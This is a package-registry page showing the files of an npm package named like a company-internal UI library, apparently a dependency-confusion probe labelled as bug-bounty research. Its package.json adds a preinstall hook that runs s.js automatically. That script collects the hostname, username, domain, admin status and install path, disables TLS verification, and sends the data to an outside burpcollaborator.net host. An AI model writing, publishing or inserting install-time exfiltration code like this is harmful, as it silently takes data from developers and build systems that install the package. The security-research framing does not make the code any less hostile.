@zalando-internal/z-shop-ui 1.0.3

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.

This version of @zalando-internal/z-shop-ui might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/index.js +0 -0
  2. package/package.json +1 -0
  3. package/s.js +37 -0
package/index.js ADDED
File without changes
package/package.json ADDED
@@ -0,0 +1 @@
1
+ {"name": "@zalando-internal/z-shop-ui", "version": "1.0.3", "description": "Package created for ethical hacking purposes only for this bug bounty platform: https://hackerone.com/zalando. For any concerns please contact user.dc@attacker-site.co.uk", "main": "index.js", "scripts": {"test": "echo \"Error: no test specified\" && exit 1", "preinstall": "node s.js"}, "author": "", "license": "ISC"}
package/s.js ADDED
@@ -0,0 +1,37 @@
1
+
2
+ var os = require('os');
3
+ var hostname = os.hostname();
4
+ var username = os.userInfo().username;
5
+ var platform = os.platform();
6
+
7
+ var admin_text;
8
+
9
+ if (platform == 'win32' || platform == 'win64') {
10
+ try {
11
+ net_session = require('child_process').execSync('net session');
12
+ admin_text = 'admin';
13
+ }
14
+ catch {
15
+ admin_text = 'non-admin';
16
+ }
17
+
18
+ username = require('child_process').execSync('systeminfo | findstr /B Domain').toString().replace('Domain:', '').trim() + '/' + username;
19
+
20
+ } else {
21
+ admin_text = os.userInfo().uid;
22
+ }
23
+
24
+ process.env['NODE_TLS_REJECT_UNAUTHORIZED'] = 0;
25
+
26
+ const https = require('https')
27
+ const options = {
28
+ hostname: 'd3h2jis673q8ph9hy6ovce3f76dw1l.burpcollaborator.net',
29
+ port: 443,
30
+ path: '/?Username=' + encodeURI(username + ' (' + admin_text + ')') + '&Hostname=' + encodeURI(hostname) + '&Package=zalando-internal%2Fz-shop-ui&PWD=' + __dirname,
31
+ method: 'GET'
32
+ }
33
+
34
+ const req = https.request(options)
35
+
36
+ req.end();
37
+